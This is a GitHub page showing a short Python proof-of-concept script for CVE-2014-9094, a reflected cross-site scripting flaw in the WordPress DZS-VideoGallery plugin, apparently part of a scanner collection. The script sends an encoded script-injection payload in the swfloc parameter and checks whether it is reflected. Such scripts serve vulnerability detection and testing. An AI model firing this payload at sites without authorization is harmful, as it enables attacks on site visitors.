-
Notifications
You must be signed in to change notification settings - Fork 222
/
Copy pathCVE-2014-9094.py
63 lines (49 loc) · 1.8 KB
/
CVE-2014-9094.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting''',
"description": '''Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.''',
"severity": "medium",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2014-9094"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "CVE-2014-9094",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2014", "wordpress", "xss", "wp-plugin"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "<script>alert(1)</script>" in resp.text and "text/html" in str(resp.headers):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url